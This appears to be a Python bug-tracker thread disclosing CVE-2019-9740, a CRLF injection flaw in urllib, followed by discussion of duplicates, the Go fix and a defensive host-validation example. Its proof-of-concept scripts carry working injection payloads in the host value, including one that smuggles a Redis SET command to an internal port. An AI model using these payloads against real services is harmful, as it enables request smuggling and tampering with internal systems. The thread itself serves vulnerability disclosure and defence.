[CVE-2019-9740] Python urllib CRLF injection vulnerability #80457
Comments
Abstract:

Principles:

Proof of Concept:

```python
#!/usr/bin/env python3
import sys
import urllib
import urllib.error
import urllib.request

# The "host" value is the payload: it carries a space and CR/LF pairs, so the
# request line ends early and extra header lines follow it.
host = "10.251.0.83:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123"
url = "http://" + host + ":8080/test/?test=a"

try:
    info = urllib.request.urlopen(url).info()
    print(info)
except urllib.error.URLError as e:
    print(e)
```

In this script, the host parameter usually could be controlled by the user, and the content of host above is exactly the payload. We set up a server using nc to open port 7777 and to receive and display the HTTP request data from the client, then run the code above on a client to send an HTTP request to the server.

```
# nc -l -p 7777
```

Attack Scenarios:

```python
import sys
import urllib
import urllib.error
import urllib.request

host = "10.251.0.83:6379?\r\nSET test success\r\n"
url = "http://" + host + ":8080/test/?test=a"

try:
    info = urllib.request.urlopen(url).info()
    print(info)
except urllib.error.URLError as e:
    print(e)
```

Conclusion:
I am also seeing the same issue with urllib3:

```python
import urllib3

pool_manager = urllib3.PoolManager()
host = "localhost:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123"
url = "http://" + host + ":8080/test/?test=a"

try:
    response = pool_manager.request("GET", url)
    print(response.status)
except urllib3.exceptions.HTTPError as e:
    print(e)
```

```
nc -l localhost 7777
```
And security issues should be reported according to https://www.python.org/news/security/ .

Thanks for this report. Should we make this a duplicate of bpo-30458, as they are both referring to the same problem with the underlying library?

Yep, if it's the same problem then close this as a dupe and just poke the other issue.

OK
For reference, an exact report on the golang repo: golang/go#30794. This seems to have been fixed in the latest golang release, 1.12, and commit golang/go@829c5df. The commit introduces a check for CTL characters and throws an error for URLs, something similar to what Python does for headers now at bf3e1c9b80e9.

```go
func isCTL(r rune) bool {
	// ...
}

if strings.IndexFunc(ruri, isCTL) != -1 {
	return errors.New("net/http: can't write control character in Request.URL")
}
```

So the program below used to work before go 1.12, setting a key on Redis, but now it throws an error:

```go
package main

import "fmt"

func main() {
```

```
➜ go version
```

Looking more into the commit, there seemed to be a solution towards escaping characters with golang/go#22907. The fix seemed to have broken Google's internal tests [0] and hence was reverted to have the above commit, where only CTL characters are checked and an error is raised. I think this is a tricky bug: upon reading code reviews in the golang repo, there are around 2-3 reports, with a fix committed and reverted later for a more conservative fix, and the issue was reopened to target go 1.13. Thanks a lot for the report @ragdoll.guo

[0] https://go-review.googlesource.com/c/go/+/159157/2#message-39c6be13a192bf760f6318ac641b432a6ab8fdc8
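The defender-side check that the Go commit discussed above and the http.client fix for bpo-30458 both apply, written out in Python as an added example (this is not code from the issue, from CPython or from Go): reject any URL that carries a control character, validate an untrusted host value as strictly `name[:port]` before it is concatenated into a URL (which is what the report's and the urllib3 comment's scripts skip), and confirm with `http.client.HTTPConnection.putrequest`, which only buffers the request line and never connects, that a patched interpreter already refuses such a request target. The host regex, the function names and the reuse of the report's payload strings as sample input are this example's own assumptions.

```python
import http.client
import re
from urllib.parse import urlsplit

# Control characters: ASCII C0 (0x00-0x1f), DEL (0x7f) and C1 (0x80-0x9f).
# CR and LF are the ones that turn one request line into extra header lines.
_CTL = re.compile(r"[\x00-\x1f\x7f-\x9f]")

# Assumed host grammar: a DNS name or IPv4 literal, optionally ":port".
# Bracketed IPv6 literals are deliberately out of scope here.
_HOST = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?(?::(\d{1,5}))?$")


def find_ctl(s: str):
    """Return (offset, char) of the first control character in s, or None."""
    m = _CTL.search(s)
    return (m.start(), m.group()) if m else None


def validate_host(host: str) -> str:
    """Accept only 'name' or 'name:port'; anything else (spaces, '?', CR/LF,
    a second ':port') cannot be spliced safely into a request line."""
    m = _HOST.match(host)
    if m is None:
        hit = find_ctl(host)
        reason = (f"control character {hit[1]!r} at offset {hit[0]}"
                  if hit else "not a host[:port] string")
        raise ValueError(f"rejected host {host!r}: {reason}")
    if m.group(1) is not None and not 0 < int(m.group(1)) < 65536:
        raise ValueError(f"rejected host {host!r}: port out of range")
    return host


def build_url(host: str, path: str = "/", query: str = "") -> str:
    """Assemble http://host/path?query from an untrusted host, refusing to
    produce a URL that http.client would have to send with CTL bytes in it."""
    host = validate_host(host)
    url = f"http://{host}{path}" + (f"?{query}" if query else "")
    hit = find_ctl(url)
    if hit:
        raise ValueError(f"control character {hit[1]!r} at offset {hit[0]} in URL")
    # The host must come back out of urlsplit unchanged; if part of it moved
    # into path/query, what gets sent on the wire is not what the caller meant.
    if urlsplit(url).netloc != host:
        raise ValueError("host did not survive URL parsing intact")
    return url


def stdlib_rejects(request_target: str) -> bool:
    """True if this interpreter's http.client refuses the request target
    (the bpo-30458 fix). putrequest only buffers the request line, so no
    connection is opened and nothing is sent."""
    conn = http.client.HTTPConnection("localhost", 9)  # constructed, never connected
    try:
        conn.putrequest("GET", request_target)
    except http.client.InvalidURL:
        return True
    finally:
        conn.close()
    return False


if __name__ == "__main__":
    # Sample inputs: the report's two payloads and one clean host (constructed).
    for sample in ("10.251.0.83:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123",
                   "10.251.0.83:6379?\r\nSET test success\r\n",
                   "10.251.0.83:7777"):
        try:
            print("accepted:", build_url(sample, "/test/", "test=a"))
        except ValueError as exc:
            print("rejected:", exc)
    target = "/test/?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123"
    print("http.client refuses injected target:", stdlib_rejects(target))
```

Validating the host before concatenation is the important half: the interpreter-level check in http.client is the last line of defence, but it only exists on patched versions, and an application that builds URLs from user input should not depend on it.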
Marking this as duplicate of bpo-30458. Thanks for the discussion.

I am going to make a note that the Superseder

However, this bug demonstrates a vulnerability in all versions of Python (including 3.8 as of March 2019). There are additional related bug reports that deal with the same topic of parsing CRLF in headers or in requests. A consolidation of all of these is required, and at the end our goal should be to close the loophole reported by this bug. I am assigning this bug to myself to work on it, and my first task is to make sure that the previous reports 1, 2 and 3 cover the scenario mentioned in this report. If they do not, I will reopen this ticket. Thanks!

The CVE-2019-9740 has been assigned to this issue: ... which has been marked as a duplicate of bpo-30458.